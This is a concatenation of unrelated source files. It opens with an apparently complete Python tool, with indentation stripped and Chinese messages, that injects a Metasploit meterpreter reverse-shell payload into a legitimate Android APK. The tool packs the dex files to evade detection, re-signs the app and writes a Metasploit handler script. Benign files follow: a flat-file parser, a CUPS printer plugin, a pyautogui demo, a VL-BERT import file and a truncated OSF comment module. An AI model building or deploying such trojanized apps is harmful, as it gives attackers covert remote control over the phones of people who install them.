AddSleep()
CheckJavaVersion()
def CheckJavaVersion():
(out, err)= subprocess.Popen(f'{JavaCommand} -version', stdout=subprocess.PIPE, shell=True, stderr=subprocess.STDOUT).communicate()
if sys.platform == 'win32':
out = out.decode('gbk')
else:
out = out.decode('utf-8')
if 'version' not in out:
Print.PrintError(f'系统中未安装java环境,或者配置了错误的java路径`{JavaCommand}`,请修改`utils/config.py`文件中JavaPath对应值...')
ExitScript()
def MkDir(**kwargs):
if os.path.exists(kwargs['TestDir']):
rmtree(kwargs['TestDir'])
for _ in kwargs['MakeDirs']:
os.mkdir(_)
AddSleep()
def MkTestDir():
Print.PrintInfo(f'创建临时文件目录...')
MakeDirs = [TestDir, TestDirApkFile, TestDirDexFile, TestDirUnZipApkPath, TestDirAppUnSmaliPath, TestDirMsfUnSmaliPath, TestDirUnZipXmlPath]
Print.PrintStatus(
f'正在创建临时文件夹...',
MkDir,
TestDir=TestDir,
MakeDirs=MakeDirs
)
Print.PrintDirTree(TestDir, 4)
Print.PrintSuccess(f'临时文件目录创建成功!')
def UnzipApk(apkpath):
Print.PrintInfo(f'解压需要注入App...')
apk = ZipApkFile(apkpath, 'r', OPTIONS)
Print.PrintStatus(
f'正在解压{apkpath}...',
apk.UnZipApk,
)
Print.PrintDirTree(TestDirApkFile, 3)
Print.PrintSuccess(f'注入App`{apkpath}`解压成功!')
def CreateMsf():
Print.PrintInfo(f'构建msf dex文件, 创建Msf handler.rc...')
msf = CreateMsfDex(MsfPayload, MsfLHost, MsfLPort, OPTIONS)
CreateMsfHandler()
Print.PrintStatus(
f'开始构建msf dex文件, 创建Msf handler.rc...',
msf.Generate
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'msf dex文件构建成功! 保存在`{MsfBuildDexFile}`')
Print.PrintSuccess(f'Msf handler.rc构建成功! 保存在`{MsfHandler}`')
def CopyUnZipApkFile():
Print.PrintInfo(f'复制Apk解压的dex文件...')
for _ in os.listdir(TestDirUnZipApkPath):
AppDexFile = ReslovePath(TestDirUnZipApkPath, _)
if AppDexFile.endswith('.dex') :
copyfile(AppDexFile, ReslovePath(TestDirAppUnSmaliPath, _))
Print.PrintStatus(
f'正在复制Apk解压的dex文件...',
AddSleep
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'App解压的dex文件复制成功!\n')
def DecodeAndroidManifest():
Print.PrintInfo(f'准备解码App的AndroidManifest.xml文件...')
DecodeAndroidManifestPath = ReslovePath(TestDirUnZipXmlPath, 'AndroidManifest_Decode.xml')
AndroidManifestPath = ReslovePath(TestDirUnZipApkPath, 'AndroidManifest.xml')
Jar = JarCommand(OPTIONS)
Print.PrintStatus(
f'解码App的{AndroidManifestPath}中...',
Jar.Xml2Axml,
androidmanifestfile=AndroidManifestPath,
androidmanifestdecodefile=DecodeAndroidManifestPath
)
Print.PrintDirTree(TestDirUnZipXmlPath, 3)
Print.PrintSuccess(f'解码AndroidManifest.xml文件成功,保存在`{DecodeAndroidManifestPath}`')
def BakSmaliDexFile():
Print.PrintInfo(f'准备反编译msf的dex文件...')
Jar = JarCommand(OPTIONS)
MsfSmaliPath = ReslovePath(TestDirMsfUnSmaliPath, 'classes')
Print.PrintStatus(
f'正在反编译msf的dex文件...',
Jar.Dex2Smail,
dexfilepath=MsfBuildDexFile,
smalidirpath=MsfSmaliPath
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'反编译msf的dex文件成功,保存在`{TestDirMsfUnSmaliPath}`')
Print.PrintInfo(f'准备反编译App的dex文件...')
for _ in os.listdir(TestDirUnZipApkPath):
AppDexFile = ReslovePath(TestDirUnZipApkPath, _)
AppSmaliPath = os.path.splitext(ReslovePath(TestDirAppUnSmaliPath, _))[0]
if AppDexFile.endswith('.dex') :
Print.PrintStatus(
f'正在反编译App的{_}文件...',
Jar.Dex2Smail,
dexfilepath=AppDexFile,
smalidirpath=AppSmaliPath
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'反编译App的dex文件成功,保存在`{TestDirAppUnSmaliPath}`')
def InjectMsf2Apk():
Print.PrintInfo(f'准备将msf的smali文件注入到App中...')
Inject = InjectMsf2App(OPTIONS)
DecodeAndroidManifestPath = ReslovePath(TestDirUnZipXmlPath, 'AndroidManifest_Decode.xml')
InjectMsfSmaliPath = ReslovePath(TestDirMsfUnSmaliPath, 'classes')
AppLauncherActivity, MoveAppLauncherActivityClassPath, InjectAppLauncherActivitSmaliPath = Inject.GetInjectAppLauncherActivitFile(appdexpath=TestDirAppUnSmaliPath, androidmanifestfile=DecodeAndroidManifestPath)
VARS = Inject.RandomMsfSmali(msfsmalipath=InjectMsfSmaliPath)
i = 0
while True:
ChangeCode = Inject.InjectMsf2SmaliFile(vars=VARS, injectapplauncheractivitsmalipath=InjectAppLauncherActivitSmaliPath)
if ChangeCode == False and i == 0:
Print.PrintError(f'不能在`{InjectAppLauncherActivitSmaliPath}`中找到App默认启动组件`.method public onCreate()V`, 无法将Msf注入App! 请分析此文件逻辑,找到默认启动组件所在的smali文件. 请参考`https://github.com/cleverbao/520apkhook/issues/1`.')
Print.PrintInfo(f'是否找到App默认启动组件? 输入`n/N`退出程序.\n')
SmaliPath = Print.PrintInput(f'Input').strip()
print()
i += 1
elif ChangeCode == False and i > 0:
SmaliPath = Print.PrintInput(f'Input').strip()
else:
if i > 0:
Print.PrintSuccess(f'你已输入正确的smali文件`{InjectAppLauncherActivitSmaliPath}`, 程序继续...')
break
if SmaliPath == 'n' or SmaliPath == 'N':
Print.PrintError(f'你已选择退出程序...')
ExitScript()
if os.path.exists(SmaliPath) :
InjectAppLauncherActivitSmaliPath = SmaliPath
else:
Print.PrintError(f'输入的文件不存在, 请重试...')
Inject.CopyMsfSmali2AppSmali(vars=VARS, msfsmalipath=InjectMsfSmaliPath, moveapplauncheractivityclasspath=MoveAppLauncherActivityClassPath)
Print.PrintStatus(
f'正在将msf的smali文件注入到App中...',
Inject.AddSleep
)
Print.PrintLogo(f'\n修改代码: {ChangeCode}')
Print.PrintSuccess(f'成功将msf的smali文件注入到App中,主要修改`{InjectAppLauncherActivitSmaliPath}`文件.')
def EditorAndroidManifest():
Print.PrintInfo(f'准备注入msf权限和壳信息到AndroidManifest.xml中...')
Inject = InjectMsf2App(OPTIONS)
DecodeAndroidManifestPath = ReslovePath(TestDirUnZipXmlPath, 'AndroidManifest_Decode.xml')
InjectMsfSmaliPath = ReslovePath(TestDirMsfUnSmaliPath, 'classes')
AppLauncherActivity = Inject.GetInjectAppLauncherActivit(androidmanifestfile=DecodeAndroidManifestPath)
Jar = JarCommand(OPTIONS)
AndroidManifestPath = ReslovePath(TestDirUnZipApkPath, 'AndroidManifest.xml')
NewAndroidManifestPath = ReslovePath(TestDirUnZipXmlPath, 'NewAndroidManifest.xml')
AndroidManifestOption = f'-an {SteadyLauncherActivity} -md app_name:{AppLauncherActivity} '
for UsesPermission in OPTIONS['UsesPermission']:
AndroidManifestOption += f'-up {UsesPermission} '
Print.PrintStatus(
f'正在注入msf权限和壳信息到AndroidManifest.xml中...',
Jar.ManifestEditor,
androidmanifestfile=AndroidManifestPath,
newandroidmanifestfile=NewAndroidManifestPath,
xmloptionscommand=AndroidManifestOption
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'成功将msf权限和壳信息注入App的AndroidManifest.xml,生成新文件`{NewAndroidManifestPath}`文件.')
def RestoreApp():
Print.PrintInfo(f'准备编译还原App的smali文件为dex文件...')
Jar = JarCommand(OPTIONS)
for _ in os.listdir(TestDirAppUnSmaliPath):
AppSmaliPath = ReslovePath(TestDirAppUnSmaliPath, _)
AppDexFile = ReslovePath(TestDirAppUnSmaliPath, f'{_}.dex')
if os.path.isdir(AppSmaliPath):
Print.PrintStatus(
f'正在编译还原{_}为dex文件...',
Jar.Smail2Dex,
dexfilepath=AppDexFile,
smalidirpath=AppSmaliPath
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'编译还原App的smali文件为dex文件成功,保存在`{TestDirAppUnSmaliPath}`')
def EnCryptDexFile():
Print.PrintInfo(f'准备对新生成的dex文件进行加壳...')
Cryptor = EncryptFile(OPTIONS)
for _ in os.listdir(TestDirAppUnSmaliPath):
AppDexFile = ReslovePath(TestDirAppUnSmaliPath, _)
if os.path.isfile(AppDexFile):
Print.PrintStatus(
f'正在对{_}文件进行加壳...',
Cryptor.EnCryptDexFile,
olddexfile=AppDexFile,
newdexfile=f'{AppDexFile}.EnCrypt'
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'对新生成的dex文件进行加壳成功,保存在`{TestDirAppUnSmaliPath}`')
def CopyDexJniFile():
Print.PrintInfo(f'准备复制加密后的dex文件和注入后的AndroidManifest.xml到App目录...')
InjectAndroidManifestPath = ReslovePath(TestDirUnZipXmlPath, 'NewAndroidManifest.xml')
AppAndroidManifestPath = ReslovePath(TestDirUnZipApkPath, 'AndroidManifest.xml')
copyfile(InjectAndroidManifestPath, AppAndroidManifestPath)
for _ in os.listdir(TestDirAppUnSmaliPath):
AppDexFile :str = ReslovePath(TestDirAppUnSmaliPath, _)
if AppDexFile.endswith('.EnCrypt') :
DexName :str = os.path.basename(AppDexFile).split('.')[0]
ReSearch = re.search(r'classes(\d)', DexName)
if ReSearch:
NewNum = int(ReSearch[1]) + 1
NewDexFile = ReslovePath(TestDirUnZipApkPath, f'classes{NewNum}.dex')
else:
NewDexFile = ReslovePath(TestDirUnZipApkPath, f'classes2.dex')
copyfile(AppDexFile, NewDexFile)
Print.PrintStatus(
f'正在复制加密后的dex文件和注入后的AndroidManifest.xml到App目录...',
AddSleep
)
Print.PrintDirTree(TestDirUnZipApkPath, 2)
Print.PrintSuccess(f'复制加密后的dex文件和注入后的AndroidManifest.xml到App目录成功,保存在`{TestDirUnZipApkPath}`')
Print.PrintInfo(f'准备复制steady的壳文件到App目录...')
CopyAppDexFile = ReslovePath(TestDirUnZipApkPath, 'classes.dex')
CopyAppLibTmpPath = ReslovePath(TestDirApkFile, 'lib_tmp')
CopyAppLibPath = ReslovePath(TestDirUnZipApkPath, 'lib')
AppArmeabiDir = ReslovePath(CopyAppLibPath, 'armeabi')
AppArmeabiV7aDir = ReslovePath(CopyAppLibPath, 'armeabi-v7a')
AppArm64V8aDir = ReslovePath(CopyAppLibPath, 'arm64-v8a')
AppArmX86Dir = ReslovePath(CopyAppLibPath, 'x86')
AppArmX64Dir = ReslovePath(CopyAppLibPath, 'x86_64')
CopyTree(SteadyLibFile, CopyAppLibTmpPath)
copyfile(SteadyDexFile, CopyAppDexFile)
for _ in '1':
if os.path.exists(AppArm64V8aDir):
continue
elif os.path.exists(AppArmeabiV7aDir):
rmtree(ReslovePath(CopyAppLibTmpPath, 'arm64-v8a'))
continue
elif os.path.exists(AppArmeabiDir):
rmtree(ReslovePath(CopyAppLibTmpPath, 'armeabi-v7a'))
CopyTree(AppArmeabiDir, ReslovePath(CopyAppLibTmpPath, 'arm64-v8a'))
for _ in '1':
if os.path.exists(AppArmX64Dir):
continue
elif os.path.exists(AppArmX86Dir):
rmtree(ReslovePath(CopyAppLibTmpPath, 'x86_64'))
CopyTree(CopyAppLibTmpPath, CopyAppLibPath)
Print.PrintStatus(
f'正在复制steady的壳文件到App目录...',
AddSleep
)
Print.PrintDirTree(CopyAppLibPath, 2)
Print.PrintSuccess(f'复制steady的壳文件到App目录成功,保存在`{CopyAppLibPath}`')
def ZipNewApkFile():
Print.PrintInfo(f'准备打包注入完成的Apk文件...')
Zip = ZipApkFile(ZipFinishApk, 'w', OPTIONS)
Print.PrintStatus(
f'正在打包注入完成的Apk文件...',
Zip.ZipApk
)
Print.PrintDirTree(TestDir, 3)
Print.PrintSuccess(f'打包注入完成的Apk文件成功,保存在`{ZipFinishApk}`')
def ApkSigner():
Print.PrintInfo(f'准备对打包的Apk文件进行签名...')
Jar = JarCommand(OPTIONS)
Print.PrintStatus(
f'正在对打包的{ZipFinishApk}文件进行签名...',
Jar.ApkSigner,
apkfilepath=ZipFinishApk
)
Print.PrintDirTree(TestDir, 3)
Print.PrintSuccess(f'对打包的Apk文件进行签名成功,保存在`{ZipFinishApk}`')
def CreateMsfHandler():
if MsfPayload in ['android/meterpreter/reverse_http', 'android/meterpreter/reverse_https']:
MsfPayloadType = MsfPayload
else:
MsfPayloadType = 'android/meterpreter/reverse_tcp'
with open(MsfHandler,"w") as handler:
handler.write("use exploit/multi/handler\n")
handler.write(f"set payload {MsfPayloadType}\n")
handler.write(f'set AutoLoadStdapi true\n')
handler.write("set LHOST 0.0.0.0\n")
handler.write(f"set LPORT {MsfLPort}\n")
handler.write("set exitonsession false\n")
handler.write("exploit -j")
def EncryptNotInjectMsfCopy():
Print.PrintInfo(f'准备复制App的dex文件到UnSmali目录...')
for _ in os.listdir(TestDirUnZipApkPath):
AppDexFile :str = ReslovePath(TestDirUnZipApkPath, _)
if AppDexFile.endswith('.dex') :
NewDexFile = ReslovePath(TestDirAppUnSmaliPath, _)
copyfile(AppDexFile, NewDexFile)
Print.PrintStatus(
f'正在复制App的dex文件到UnSmali目录...',
AddSleep
)
Print.PrintDirTree(TestDirDexFile, 2)
Print.PrintSuccess(f'复制App的dex文件到UnSmali目录成功,保存在`{TestDirAppUnSmaliPath}`')
def EncryptNotInjectMsf():
Print.PrintRule('开始进行准备工作...', 'green bold')
Print.PrintSuccess(f'获取到需要进行加固的app程序!')
MkTestDir()
UnzipApk(InjectNormalApk)
DecodeAndroidManifest()
EncryptNotInjectMsfCopy()
Print.PrintSuccess(f'准备工作已完成!\n')
Print.PrintRule('开始进行加固工作...', 'blue bold')
EditorAndroidManifest()
EnCryptDexFile()
CopyDexJniFile()
Print.PrintSuccess(f'加固工作已完成!\n')
Print.PrintRule('开始进行结尾工作...', 'red bold')
ZipNewApkFile()
ApkSigner()
Print.PrintRule(f'所有工作已完成! ')
print('')
Print.PrintError(f'生成的Apk在: {ZipFinishApk}')
def InjectMsfNotEncryptCopy():
Print.PrintInfo(f'准备复制App的dex文件到Unzip目录...')
for _ in os.listdir(TestDirAppUnSmaliPath):
AppDexFile :str = ReslovePath(TestDirAppUnSmaliPath, _)
if AppDexFile.endswith('.dex') :
NewDexFile = ReslovePath(TestDirUnZipApkPath, _)
copyfile(AppDexFile, NewDexFile)
Print.PrintStatus(
f'正在复制App的dex文件到Unzip目录...',
AddSleep
)
Print.PrintDirTree(TestDirUnZipApkPath, 2)
Print.PrintSuccess(f'复制App的dex文件到Unzip目录成功,保存在`{TestDirUnZipApkPath}`')
def InjectMsfNotEncrypt():
Print.PrintRule('开始进行准备工作...', 'green bold')
Print.PrintSuccess(f'获取到需要进行注入的app程序!')
MkTestDir()
UnzipApk(InjectNormalApk)
CreateMsf()
DecodeAndroidManifest()
Print.PrintSuccess(f'准备工作已完成!')
Print.PrintRule('开始进行注入工作...', 'blue bold')
BakSmaliDexFile()
InjectMsf2Apk()
RestoreApp()
InjectMsfNotEncryptCopy()
Print.PrintSuccess(f'注入工作已完成!\n')
Print.PrintRule('开始进行结尾工作...', 'red bold')
ZipNewApkFile()
ApkSigner()
Print.PrintRule(f'所有工作已完成! ')
print('')
Print.PrintError(f'生成的远控Apk在: {ZipFinishApk}')
Print.PrintError(f'生成的Msf Handler在: {MsfHandler}')
def InjectAndEncrypt():
Print.PrintRule('开始进行准备工作...', 'green bold')
Print.PrintSuccess(f'获取到需要进行注入的app程序!')
MkTestDir()
UnzipApk(InjectNormalApk)
CreateMsf()
DecodeAndroidManifest()
Print.PrintSuccess(f'准备工作已完成!')
Print.PrintRule('开始进行注入工作...', 'blue bold')
BakSmaliDexFile()
InjectMsf2Apk()
EditorAndroidManifest()
RestoreApp()
EnCryptDexFile()
CopyDexJniFile()
Print.PrintSuccess(f'注入工作已完成!')
Print.PrintRule('开始进行结尾工作...', 'red bold')
ZipNewApkFile()
ApkSigner()
Print.PrintRule(f'所有工作已完成! ')
print('')
Print.PrintError(f'生成的远控Apk在: {ZipFinishApk}')
Print.PrintError(f'生成的Msf Handler在: {MsfHandler}')
if __name__ == '__main__':
sys.excepthook = MyExceptHook
Print = CustomPrint()
Print.PrintLogo(LOGO)
Arguments = GetArguments()
InjectNormalApk = Arguments.normalapk
MsfPayload = Arguments.payload.strip()
MsfLHost = Arguments.lhost.strip()
MsfLPort = Arguments.lport.strip()
if not os.path.exists(InjectNormalApk):
Print.PrintError(f"[需要注入的apk文件不存在,请检查`-n/--normal-apk`参数!\n")
ExitScript()
InjectNormalApk = ReslovePath(InjectNormalApk)
TestDir = ReslovePath(OPTIONS['TestDir'])
TestDirApkFile = ReslovePath(OPTIONS['TestDirApkFile'])
TestDirDexFile = ReslovePath(OPTIONS['TestDirDexFile'])
TestDirUnZipApkPath = ReslovePath(OPTIONS['TestDirUnZipApkPath'])
TestDirAppUnSmaliPath = ReslovePath(OPTIONS['TestDirAppUnSmaliPath'])
TestDirMsfUnSmaliPath = ReslovePath(OPTIONS['TestDirMsfUnSmaliPath'])
TestDirUnZipXmlPath = ReslovePath(OPTIONS['TestDirUnZipXmlPath'])
MsfBuildDexFile = ReslovePath(OPTIONS["MsfBuildDexFile"])
UsesPermission = OPTIONS['UsesPermission']
SteadyLauncherActivity = OPTIONS['SteadyLauncherActivity']
SteadyDexFile = ReslovePath(OPTIONS['SteadyDexFile'])
SteadyLibFile = ReslovePath(OPTIONS['SteadyLibFile'])
ZipFinishApk = ReslovePath(OPTIONS['ZipFinishApk'])
MsfHandler = ReslovePath(OPTIONS['MsfHandler'])
JavaCommand = OPTIONS['JavaPath']
    if not os.path.exists(JavaCommand):
        # fall back to the plain `java` on PATH when the configured JavaPath does not exist
        JavaCommand = 'java'
Print.PrintStatus(
f'正在检查环境信息...',
CheckEnv
)
Mode = Arguments.mode.strip()
if Mode == '1':
Print.PrintInfo(f'你选择了模式1, 对App注入Msf并加固...')
Print.PrintInfo(f'你选择Payload类型为`{MsfPayload}`...')
InjectAndEncrypt()
elif Mode == '2':
Print.PrintInfo(f'你选择了模式2, 仅注入Msf到App中...')
Print.PrintInfo(f'你选择Payload类型为`{MsfPayload}`...')
InjectMsfNotEncrypt()
elif Mode == '3':
Print.PrintInfo(f'你选择了模式3, 仅加固App...')
EncryptNotInjectMsf()
ExitScript()
|
data/flatfileparser.py
|
MonashTS/lbimproved
| 101 |
88205
|
def readFlat(filename, delimiter):
    # Read a delimited flat file into a list of rows of floats (works on both Python 2 and 3,
    # where the original map/filter version would yield lazy iterators under Python 3).
    ans = []
    with open(filename) as f:
        for line in f:
            ans.append([float(x) for x in line.split(delimiter) if len(x) > 0])
    return ans
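# --- Editor's hedged usage sketch; the file name below is hypothetical ---
if __name__ == '__main__':
    rows = readFlat('example_series.csv', ',')   # e.g. comma-delimited rows of numbers
    print(len(rows), 'rows read, first row:', rows[0] if rows else None)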
|
platypush/plugins/printer/cups.py
|
RichardChiang/platypush
| 228 |
88207
|
<filename>platypush/plugins/printer/cups.py
import os
from typing import Optional, Dict, Any, List
from platypush.message.response.printer.cups import PrinterResponse, PrintersResponse, PrinterJobAddedResponse
from platypush.plugins import Plugin, action
class PrinterCupsPlugin(Plugin):
"""
A plugin to interact with a CUPS printer server.
Requires:
- **pycups** (``pip install pycups``)
"""
def __init__(self, host: str = 'localhost', printer: Optional[str] = None, **kwargs):
"""
:param host: CUPS host IP/name (default: localhost).
:param printer: Default printer name that should be used.
"""
super().__init__(**kwargs)
self.host = host
self.printer = printer
def _get_connection(self, host: Optional[str] = None):
# noinspection PyPackageRequirements
import cups
connection = cups.Connection(host=host or self.host)
return connection
def _get_printer(self, printer: Optional[str] = None):
printer = printer or self.printer
assert printer, 'No printer specified nor default printer configured'
return printer
@action
def get_printers(self, host: Optional[str] = None) -> PrintersResponse:
"""
Get the list of printers registered on a CUPS server.
:param host: CUPS server host IP/name (default: default configured ``host``).
:return: :class:`platypush.message.response.printer.cups.PrintersResponse`, as a name -> attributes dict.
"""
conn = self._get_connection(host)
return PrintersResponse(printers=[
PrinterResponse(
name=name,
printer_type=printer.get('printer-type'),
info=printer.get('printer-info'),
uri=printer.get('device-uri'),
state=printer.get('printer-state'),
is_shared=printer.get('printer-is-shared'),
state_message=printer.get('printer-state-message'),
state_reasons=printer.get('printer-state-reasons', []),
location=printer.get('printer-location'),
uri_supported=printer.get('printer-uri-supported'),
make_and_model=printer.get('printer-make-and-model'),
)
for name, printer in conn.getPrinters().items()
])
@action
def print_test_page(self, printer: Optional[str] = None, host: Optional[str] = None) -> PrinterJobAddedResponse:
"""
Print the CUPS test page.
:param printer: Printer name (default: default configured ``printer``).
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
job_id = conn.printTestPage(printer)
return PrinterJobAddedResponse(printer=printer, job_id=job_id)
@action
def print_file(self,
filename: str,
printer: Optional[str] = None,
host: Optional[str] = None,
title: Optional[str] = None,
options: Optional[Dict[str, Any]] = None) -> PrinterJobAddedResponse:
"""
Print a file.
:param filename: Path to the file to print.
:param printer: Printer name (default: default configured ``printer``).
:param host: CUPS server IP/name (default: default configured ``host``).
:param title: Print title.
:param options: Extra CUPS name->value options.
"""
filename = os.path.abspath(os.path.expanduser(filename))
conn = self._get_connection(host)
printer = self._get_printer(printer)
job_id = conn.printFile(printer, filename=filename, title=title or '', options=options or {})
return PrinterJobAddedResponse(printer=printer, job_id=job_id)
@action
def print_files(self,
filenames: List[str],
printer: Optional[str] = None,
host: Optional[str] = None,
title: Optional[str] = None,
options: Optional[Dict[str, Any]] = None) -> PrinterJobAddedResponse:
"""
Print a list of files.
:param filenames: Paths to the files to print.
:param printer: Printer name (default: default configured ``printer``).
:param host: CUPS server IP/name (default: default configured ``host``).
:param title: Print title.
:param options: Extra CUPS name->value options.
"""
filenames = [os.path.abspath(os.path.expanduser(f)) for f in filenames]
conn = self._get_connection(host)
printer = self._get_printer(printer)
job_id = conn.printFiles(printer, filenames=filenames, title=title or '', options=options or {})
return PrinterJobAddedResponse(printer=printer, job_id=job_id)
@action
def add_printer(self,
name: str,
ppd_file: str,
info: str,
location: Optional[str] = None,
host: Optional[str] = None):
"""
Add a printer.
:param name: Printer name - alphanumeric + underscore characters only.
:param ppd_file: Path to the PPD file with the printer information and configuration.
:param host: CUPS server IP/name (default: default configured ``host``).
:param info: Human-readable information about the printer.
:param location: Human-readable printer location info.
"""
conn = self._get_connection(host)
ppd_file = os.path.abspath(os.path.expanduser(ppd_file))
# noinspection PyArgumentList
conn.addPrinter(name=name, filename=ppd_file, info=info, location=location)
@action
def delete_printer(self, printer: str, host: Optional[str] = None):
"""
Delete a printer from a CUPS server.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
conn.deletePrinter(printer)
@action
    def enable_printer(self, printer: Optional[str] = None, host: Optional[str] = None):
"""
Enable a printer on a CUPS server.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.enablePrinter(printer)
@action
def disable_printer(self, printer: Optional[str] = None, host: Optional[str] = None):
"""
Disable a printer on a CUPS server.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.disablePrinter(printer)
@action
def get_jobs(self, host: Optional[str] = None) -> Dict[int, Dict[str, Any]]:
"""
Get the list of active jobs.
:param host: CUPS server IP/name (default: default configured ``host``).
:return: A job_id -> job_info dict.
"""
conn = self._get_connection(host)
return conn.getJobs()
@action
def accept_jobs(self, printer: Optional[str] = None, host: Optional[str] = None):
"""
Start accepting jobs on a printer.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.acceptJobs(printer)
@action
def reject_jobs(self, printer: Optional[str] = None, host: Optional[str] = None):
"""
Start rejecting jobs on a printer.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.rejectJobs(printer)
@action
def cancel_job(self, job_id: int, purge_job: bool = False, host: Optional[str] = None):
"""
Cancel a printer job.
:param job_id: Job ID to cancel.
:param purge_job: Also remove the job from the server (default: False).
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
conn.cancelJob(job_id, purge_job=purge_job)
@action
def move_job(self,
job_id: int,
source_printer_uri: str,
target_printer_uri: str,
host: Optional[str] = None):
"""
Move a job to another printer/URI.
        :param job_id: Job ID to move.
:param source_printer_uri: Source printer URI.
:param target_printer_uri: Target printer URI.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
conn.moveJob(printer_uri=source_printer_uri, job_id=job_id, job_printer_uri=target_printer_uri)
@action
def finish_document(self, printer: Optional[str] = None, host: Optional[str] = None):
"""
Finish sending a document to a printer.
:param printer: Printer name (default: default configured ``printer``).
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.finishDocument(printer)
@action
def add_printer_to_class(self,
printer_class: str,
printer: Optional[str] = None,
host: Optional[str] = None):
"""
Add a printer to a class.
:param printer_class: Class name.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.addPrinterToClass(printer, printer_class)
@action
def delete_printer_from_class(self,
printer_class: str,
printer: Optional[str] = None,
host: Optional[str] = None):
"""
Delete a printer from a class.
:param printer_class: Class name.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.deletePrinterFromClass(printer, printer_class)
@action
def get_classes(self, host: Optional[str] = None) -> Dict[str, Dict[str, Any]]:
"""
Get the list of classes on a CUPS server.
:param host: CUPS server IP/name (default: default configured ``host``).
:return: dict - class_name -> class_info.
"""
conn = self._get_connection(host)
return conn.getClasses()
# vim:sw=4:ts=4:et:
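# --- Editor's hedged usage sketch (not part of the plugin) ---
# Direct, standalone use of the plugin class, bypassing a full platypush install;
# the host, printer name and file path are assumptions, and pycups plus a
# reachable CUPS server are required.
if __name__ == '__main__':
    _plugin = PrinterCupsPlugin(host='localhost', printer='office-printer')
    print(_plugin.get_printers())   # whatever wrapper the @action decorator applies to PrintersResponse
    _plugin.print_file('~/Documents/report.pdf', title='Monthly report')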
|
pyautogui__keyboard__examples/input_and_delete__typewrite_press_keyDown_keyUp.py
|
DazEB2/SimplePyScripts
| 117 |
88216
|
<filename>pyautogui__keyboard__examples/input_and_delete__typewrite_press_keyDown_keyUp.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# SOURCE: http://pyautogui.readthedocs.io/en/latest/keyboard.html#the-press-keydown-and-keyup-functions
# pip install pyautogui
import pyautogui
TEXT = 'Hello World!'
# Input text
pyautogui.typewrite(TEXT)
# Select text
pyautogui.keyDown('shift') # Hold down the shift key
for _ in TEXT:
pyautogui.press('left') # Press the left arrow key
pyautogui.keyUp('shift') # Release the shift key
pyautogui.press('delete')
|
pretrain/modules/__init__.py
|
xiling42/VL-BERT
| 671 |
88260
|
<reponame>xiling42/VL-BERT
from .resnet_vlbert_for_pretraining import ResNetVLBERTForPretraining
from .resnet_vlbert_for_pretraining_multitask import ResNetVLBERTForPretrainingMultitask
from .resnet_vlbert_for_attention_vis import ResNetVLBERTForAttentionVis
|
website/project/views/comment.py
|
gaybro8777/osf.io
| 628 |
88267
|
# -*- coding: utf-8 -*-
import markdown
from django.utils import timezone
from flask import request
from api.caching.tasks import ban_url
from osf.models import Guid
from framework.postcommit_tasks.handlers import enqueue_postcommit_task
from website import settings
from addons.base.signals import file_updated
from osf.models import BaseFileNode, TrashedFileNode
from osf.models import Comment
from website.notifications.constants import PROVIDERS
from website.notifications.emails import notify, notify_mentions
from website.project.decorators import must_be_contributor_or_public
from osf.models import Node
from website.project.signals import comment_added, mention_added
@file_updated.connect
def update_file_guid_referent(self, target, event_type, payload, user=None):
if event_type not in ('addon_file_moved', 'addon_file_renamed'):
return # Nothing to do
source, destination = payload['source'], payload['destination']
source_node, destination_node = Node.load(source['node']['_id']), Node.load(destination['node']['_id'])
if source['provider'] in settings.ADDONS_BASED_ON_IDS:
if event_type == 'addon_file_renamed':
return # Node has not changed and provider has not changed
# Must be a move
if source['provider'] == destination['provider'] and source_node == destination_node:
return # Node has not changed and provider has not changed
file_guids = BaseFileNode.resolve_class(source['provider'], BaseFileNode.ANY).get_file_guids(
materialized_path=source['materialized'] if source['provider'] != 'osfstorage' else source['path'],
provider=source['provider'],
target=source_node
)
for guid in file_guids:
obj = Guid.load(guid)
if source_node != destination_node and Comment.objects.filter(root_target___id=guid).count() != 0:
update_comment_node(guid, source_node, destination_node)
if source['provider'] != destination['provider'] or source['provider'] != 'osfstorage':
old_file = BaseFileNode.load(obj.referent._id)
obj.referent = create_new_file(obj, source, destination, destination_node)
obj.save()
if old_file and not TrashedFileNode.load(old_file._id):
old_file.delete()
def create_new_file(obj, source, destination, destination_node):
# TODO: Remove when materialized paths are fixed in the payload returned from waterbutler
if not source['materialized'].startswith('/'):
source['materialized'] = '/' + source['materialized']
if not destination['materialized'].startswith('/'):
destination['materialized'] = '/' + destination['materialized']
if not source['path'].endswith('/'):
data = dict(destination)
new_file = BaseFileNode.resolve_class(destination['provider'], BaseFileNode.FILE).get_or_create(destination_node, destination['path'])
if destination['provider'] != 'osfstorage':
new_file.update(revision=None, data=data)
else:
new_file = find_and_create_file_from_metadata(destination.get('children', []), source, destination, destination_node, obj)
if not new_file:
if source['provider'] == 'box':
new_path = obj.referent.path
else:
